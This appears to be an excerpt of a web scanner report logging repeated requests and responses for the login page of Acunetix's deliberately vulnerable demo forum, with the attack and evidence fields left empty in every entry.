style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=59 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=60 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=61 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=62 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=63 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=64 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=65 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
